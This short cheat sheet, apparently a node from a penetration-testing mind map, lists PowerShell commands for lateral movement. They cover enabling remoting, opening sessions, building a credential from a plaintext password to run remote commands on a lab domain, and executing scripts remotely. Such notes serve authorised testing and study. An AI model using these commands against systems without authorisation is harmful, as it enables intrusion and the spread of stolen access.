x

PowerShell Lateral Movement

PowerShell Remoting

Enable PowerShell Remoting on current Machine (Needs Admin Access) 

Enable-PSRemoting

Entering or Starting a new PSSession (Needs Admin Access) 

$sess = New-PSSession -ComputerName <Name>
Enter-PSSession -ComputerName <Name> OR -Sessions <SessionName>

RCE with PS Credentials

$SecPassword = ConvertTo-SecureString '<Wtver>' -AsPlainText -Force

$Cred = New-Object System.Management.Automation.PSCredential('htb.local\<WtverUser>', $SecPassword)

Invoke-Command -ComputerName <WtverMachine> -Credential $Cred -ScriptBlock {whoami}

Import PS Module and Execute its Functions Remotely

Execute the command and start a session 

Invoke-Command -Credential $cred -ComputerName <NameOfComputer> -FilePath c:\FilePath\file.ps1 -Session $sess

Interact with the session 

Enter-PSSession -Session $sess

Executing Remote Stateful Commands

Create a new session 

$sess = New-PSSession -ComputerName <NameOfComputer>

Execute command on the session 

Invoke-Command -Session $sess -ScriptBlock {$ps = Get-Process}

Check the result of the command to confirm we have an interactive session 

Invoke-Command -Session $sess -ScriptBlock {$ps}
Left-click: follow link, Right-click: select node, Scroll: zoom
x